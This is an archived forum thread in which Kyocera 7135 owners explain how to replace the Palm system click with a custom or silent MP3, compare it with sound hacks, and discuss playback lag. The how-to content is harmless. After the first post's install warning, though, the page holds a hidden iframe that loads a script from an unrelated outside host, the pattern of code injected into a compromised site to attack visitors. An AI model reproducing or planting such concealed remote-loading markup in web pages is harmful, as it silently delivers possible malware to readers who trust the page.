+ Reply to Thread
Page 1 of 2 1 2 LastLast

FAQ: Changing the System Click

Question:

Can I customize the palm system click with a mp3?

Answer:

Yes you can! As soon as I got my 7135 this was the second issue I wanted to figure out and I was successful! The first issue was getting a SMS beep to be a MP3! Click here for that solution!

Here's what I did to make a MP3 into the system Click:

CAUTION: This does involve replacing a default system file! If you create the file incorrectly you may encounter problems--
    be sure you read these directions completely & carefully and feel free to ask questions if you are unsure about what is happening. The original "Beep" can be restored from the ROM by deleting your custom mp3 and then perform TWO soft-resets.

Step 1. Choose your victim: Select the mp3 you wish to make into your Click. I used the sound clip from the movie TRON of the bit: "YES." like the flips and ringers, I wouldn't use a 128kbps just to be safe. Name your file KWC_sndClick.mp3 - I have included the TRON version below if you want to skip to Step 3.

Step 2. Prep the patient: This
    is the easy part. Kyocera has already given us the ability to create the file, we just never knew it! Open the Kyocera Mp3maker app on your desktop and browse for the KWC_sndClick.mp3 file from Step 1 above. Choose "System " as the sound type and press "Create". Before you install this file rename the resulting KWC_sndClick.mp3.pdb to KWC_sndClick.prc

Step 3. Safety First: In the Prefs PDA app "General" settings,[b] select "OFF" for the System Sound.[b] You can skip this step during the install as long as you complete Step 5 BEFORE you do ANYTHING THAT MAKES A CLICK SOUND.

Step 4. Transplant the file: I used XP to beam it to my 7135, however you can sync it or dump it to a SD card and copy it over to your 7135 and as well. If done properly it should ask you
    if you want to replace the existing file. Answer yes

Step 5. Make the bypass: In order for the system to use the new mp3 file instead of the existing KWC_sndClick.prc from the ROM you will have to soft-reset TWICE. My unit did not recognize it until after two resets. My guess is one is for the palm-side and the other is for the phone-side. Ether way better safe than sorry.

Step 6. Reverse Step 3: In the Prefs PDA app "General" settings, turn on the Sytem Sound to any level

YOUR ALL SET. Do anything that makes a click hear your new mp3 sound instead of the standard click.

NOTES: Kyocera obviously did not intend for this to happen so it could cause problems --use at your own risk -- My unit has been running flawlessly for 48 hours with the new click.

To remove the mp3 click sound:

Step A: Perform step 3 above.

Step B: Use file manager or Filez to delete the KWC_sndClick.prc file. (You may see two of them, but the ROM version will not let you delete it, so find the other one ) IMMEADIATLY PERFROM STEP C BEFORE DOING ANYTHING OR YOU MAY CAUSE A FREEZEUP

Step C: Soft-reset TWICE and then perform step 6. YOU MUST RESEST TWICE before you do anything that results in a system click or your 7135 will Freeze! I reset ONCE and it still froze, But TWICE removed it perfectly.

-----------------------------------

Have Fun guys!! -- I know you early adopters have been wanting to do this for a while so I was happy that I could figure it out for you!. Consider this a thanks for sharing all the early-info with us! If you like what you see above, use the "Donate" button at the bottom of any page to contribute to this forum. Solutions like this are not found in the 7135 user manual!!

I'm now trying to make a Blank MP3 to get rid of the click alltogether but still have the rest of the system sounds and Flips sounds. I'll post the Mute Click file here when I figure that out.

STEVE

WARNING DO NOT INSTALL THE FILE BELOW WITHOUT READING EVERYTHING ABOVE!
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Attached Files
    iPhone therefore iAm.

Giddyup, Giddyup, Giddyup 7135 TheBeachBoy's Avatar

Here ya go

I hope this works. Since I don't have a 7135 yet (two more weeks, two more weeks, just two more... ) I haven't been able to test the file. It's the system click as silence. I made the mp3 file the same length as the "Tron" click that Steve posted just because I didn't have any other baseline for length.
    Attached Files
    TheBeachBoy

--The World's Greatest Drummer--
    Drummer for the Fondells

Re: Here ya go

Originally posted by TheBeachBoy
    I hope this works. Since I don't have a 7135 yet (two more weeks, two more weeks, just two more... ) I haven't been able to test the file. It's the system click as silence. I made the mp3 file the same length as the "Tron" click that Steve posted just because I didn't have any other baseline for length.
    Hmmm... I listened to it and didn't hear anything. So I guess that means it works
    Please visit my picture site: Robert-O-Rama :)

Ok, I'll bite. Why would you want your System Click to be a silent MP3, as opposed to just turning system clicks off?

Originally posted by jazmaan
    Ok, I'll bite. Why would you want your System Click to be a silent MP3, as opposed to just turning system clicks off?

Cause you may still want your flip sounds one but not want the click sound at the same. Both are controlled by system sound.

Thanks for the silent click thebeachboy!
    iPhone therefore iAm.

No problem

Well, with all the really cool ringers/progs/tips/undocumented help/whatever else I missed, that I've got from this site, I want to give back to the smartphone community.:angel :UpThum
    TheBeachBoy

Drummer for the Fondells

I just wanted to mention an alternative solution to this problem, which is a little simpler, although perhaps not for everyone. There's a hack called sysbeephack, which silences the eternal clicking noises, while allowing other noises to proceed normally. Can be found at one of my favorite sites lately, freewarepalm.com, http://www.freewarepalm.com/utilitie...lickhack.shtml . As with all hacks, it may not work on everyone's palm, and I'd recommend a backup beforehand, and testing after installation. I am using X-Master, and a number of hacks, without any great instability. I think Steve's solution is a more "robust" solution, in that, once the procedure is completed, there's no danger that a hack running in the background will be the cause of an error. Just wanted to post this for anyone like me, who has been too lazy , or hasn't had a chance, to play with system sounds yet.

jeh
    Yeah. I'm using something similar called "techsounds" (it was originally "treksounds", but I imagine Paramount rattled some sabers at them). Like most hacks it "hooks" various events and plays any of a variety of sounds when they occur. It comes with a variety of NewTrek-ish sounds and working the Palm sounds not unlike working a PADD when you have the "system click" set to "low click" and "form draw" set to "techbeep". Like you I haven't noticed any instabilities from it; the only real disadvantage is that there's no way to make your own sound modules.

But a few more of these, and I'll be able to get rid of it completely.

jeh
    ...or maybe not. I replaced the "click" as described by Steve, and it worked fine, in that instead of making the normal click it now played my sound. However there is a noticeable delay before it plays, and this delay seems to get in the way of the Palm's subsequent action. (Even if it didn't, a "user interface feedback click", like clicks from clicky keys on a keyboard, really should happen as close as possible to the event!) It's as though the Palm is taking longer to "find" the file when it's in RAM rather in ROM.

The same thing happens with custom flip sounds.

Whatever the cause, I find the delay is perfectly fine for something like the SMS notification, or a flip sounds for that matter. But it isn't really usable for the click replacement. I guess i'll stick with techsounds for that. Techsounds doesn't show the delay.

Interesting stuff jeh, Myself I have gone back to the normal Click as I found my Tron version annoying. hehe

When I find the time, I will have to mess with the silent version or Techsounds.
    iPhone therefore iAm.

jeh
    What would be most interesting would be a way to make your own plug-in modules for TechSounds. It supports add-ins (and several free ones are at PalmGear) but not user-developed ones.

Originally posted by jeh
    ...However there is a noticeable delay before it plays, and this delay seems to get in the way of the Palm's subsequent action. (Even if it didn't, a "user interface feedback click", like clicks from clicky keys on a keyboard, really should happen as close as possible to the event!) It's as though the Palm is taking longer to "find" the file when it's in RAM rather in ROM...

Robert K. (or anyone else that has tried the silent click),
    Since you've tried the silent click, does it interfere with the Palm's action? Obviously you wouldn't hear a delay in sound (he, he, no sound :clap ), but does it slow down the action? Otherwise, I might have to try the hack. Thanks!!
    TheBeachBoy

Drummer for the Fondells

ep
    Just for fun, I took the Kwc_9 tone and copied it to KWC_sndClick. I modified the type from "tone" to "syst" then did the double reset.

now, everytime I click, I get a number 9 dialtone.

What are the benefits of this. I'm envisioning external speed dialing. Hold your 7135 up to a landline and have a program (not yet written) play the kwc_* tones into the landline phone to dial your addressbook.

Of course, I have no use for this as I only have a cellphone (hey, you gotta cut some things to afford a 7135).

Now, if I could just find that stupid hotsync mp3 pdb file I'd be all set!
    --ep

Who needs a landline when you have a 7135

Cool stuff ep, thanks for sharing.
    iPhone therefore iAm.

what about the sounds it makes when being placed in/removed from the cradle? I'd like to silence those. "System Sound" off (in PDA Prefs) doesn't do it, and I don't want to silence the phone, as i want it to be able to ring.

Steve,

Thanks for the all the work. My incoming SMS' now say "You've got Mail", and so does my (former) reminder beep.

It looks like you replied to an earlier post saying that the system click replacement could be used as the alert for incoming email
    from Snappermail. I'd like to change the standard midi sounds
    offered with it to a custom mp3.

Does the "system click replacement" FAQ process work for Snappermail?

Thanks again.

Does anyone know how to disable the Hotsync sound from the pda/cradle you get after pushing the hotsync button? My cradle is in the bedroom and I want to be able to hotsync without waking the wife.

Thanks.

I followed the instructions above...I even tried using the files you guys made ...the unit says it is not a palm database when i try to copy it...any ideas?
    thanx
    Marc

First time poster, longtime lurker... Thanks so much for posting this info. I've got the Holy Grail "Message for you Sir!" sound as my SMS beep and I get a kick out of it everytime.

I did try the silent system click, but found that the timelag for *every* tap while the system played the silent MP3 was extremely annoying. Has anyone made a shorter silent MP3 file for system clicks? I'm betting that it won't make much difference, because I'm guessing the OS still has to switch over to the MP3 code to play it, then switch back to the running app, which is what is causing the lag...

BTW, I found how I can show off my custom SMS beep without sending myself a message: In PhonePrefs, under Keypad, change the volume of the keybeep, and it'll play the SMS beep.

-Andrew

I don't *think* it's the length of the silent MP3. I made less than half a second (.43 sec or so), which is prob. about the length of the default click. If you notice, the built-in flip sounds start playing faster than the mp3 flip sounds, so I think it's only because the default is in ROM (which someone else mentioned). So unless you're more patient than I am, I'd probably try a hack. I only use the silent click when I want to show off the flip sounds.